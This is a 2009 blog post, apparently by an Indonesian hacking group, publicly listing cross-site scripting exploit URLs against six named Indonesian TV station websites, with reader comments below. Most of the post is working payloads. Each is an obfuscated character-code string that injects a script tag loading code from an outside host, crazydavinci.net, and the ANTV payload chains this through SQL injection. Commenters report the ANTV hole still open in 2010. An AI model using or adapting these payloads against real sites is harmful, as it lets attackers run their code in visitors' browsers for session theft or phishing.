Categories Tree

Tags

Recent Posts

Recent Comments

August 28, 2009

XSS On Indo TV Stations

Posted by: Joy  :  Category: Vulnerability
Bookmark and Share

XSSEDHere, we’re gonna show you XSS (Cross Site Scripting) and XFS (XSS From SQLi) bugs on some Indo TV Stations Websites.

As you might already know that Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities. Often during an attack everything looks fine to the end-user who may be subject to unauthorized access, theft of sensitive data, and financial loss (Taken from wikipedia).

Here are some examples of their vulnerable URL :

= TransTV =

http://transtv.co.id/200706/sinopsispers.asp (Patched)

http://transtv.co.id/200706/programs.asp?aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115, 99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122, 121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34, 62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= SCTV =

http://sctv.co.id/search.php?s=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105, 112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97, 118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62))%3C/script%3E

= Indosiar =

http://indosiar.com/search?doSearch=true&qword=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114, 97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104, 112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= GlobalTV =

http://globaltv.co.id/v2/index.php?r=c2VhcmNoLnBocA%3D%3D&kw= %3Cscript%3Edocument.write%28String.fromCharCode%2860,115,99,114, 105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100, 97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62%29%29%3C/script%3E

= TVRI =

http://tvri.co.id/detail_galeri.php?id=24%27%3Cscript id=CrazydaVinci%3Edocument.write%28String.fromCharCode %2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99, 114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112, 104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E

= ANTV =

This is the worst among them, their site are vulnerable to XSS and SQL injection. But, as the topic in this post is only about XSS, we will only show you the XFS (XSS From SQLi) on their site :
http://an.tv/s/?sid=null+union+select+char%2860,115,99,114,105,112,116,32,115, 114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99, 105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105, 112,116,62%29,0–-

Let’s make indonesian sites better. ;)

12 Responses to “XSS On Indo TV Stations”

Pages: « 1 [2] Show All

  1. 3
    Black Shell Says:
    September 3rd, 2009 at 3:10 PM

    Om joy emang mantabzz dah,,,
    hahahaha

  2. 4
    Rio Says:
    September 8th, 2009 at 3:18 PM

    Weits, UNBELIEVABLE i ♥ Mr.Joy :)

  3. 5
    Rio Says:
    September 10th, 2009 at 11:11 PM

    Mr.Joy i want to know the latest XSS on FS comment, huhu Thank Alot, can you pass (menenbus) it? he

    offttopic? FS nya suspend knp bang?huhu

  4. 6
    heri Says:
    September 10th, 2009 at 11:54 PM

    om cemana sih buat wibset kayak gini……..
    bagus banget…….

  5. 7
    Joy Says:
    September 12th, 2009 at 3:43 PM

    @rio
    comment linker? sorry to say that for our safety, even it’s available or not, no more comment linker on public. ah yes :D my profile was suspended because of the no_one widget v2, i’m more into fb now ;)

    @heri
    ini basenya wordpress bro heri, tinggal ditweak aja.. :)

  6. 8
    kopies Says:
    November 25th, 2009 at 7:40 AM

    mantab bro..

    minta ajarin yang FB dunk. ahhahaa.
    uda ada email ak tuh. heheh.

  7. 9
    ĦęRяŷüńţĩţĿēđź® ⋋⏝⋌ ĽőÞĥĻĩÞĥĽüÞĥĬЬĻĩźĦ Says:
    May 3rd, 2010 at 1:36 AM

    yg antv udh di patch ea?

  8. 10
    Joy Says:
    May 3rd, 2010 at 7:15 AM

    terakhir cek sih belum. skrg connection timed out. ada msalah x sama host nya…

  9. 11
    Arturo Revard Says:
    May 19th, 2010 at 12:00 AM

    You guys did really a great work here, I’m astunished to see the quality, site bookmarked, thanks to the Admins

  10. 12
    HeRry Says:
    May 21st, 2010 at 6:05 AM

    wkwkwkwk trnyt msh bsa yg di antv, awet bgt ea :D

Pages: « 1 [2] Show All

Leave a Reply

Narsis Corner

    skull

    SEO Monitor
    SEO Stats
    :: Special Links ::
    Komunitas BSI
    :: Link Me Back ::
    = With Image =
    !CrazyDavinci!

    = Link Only =

Media-Box

Chat-Box

My Links

Archives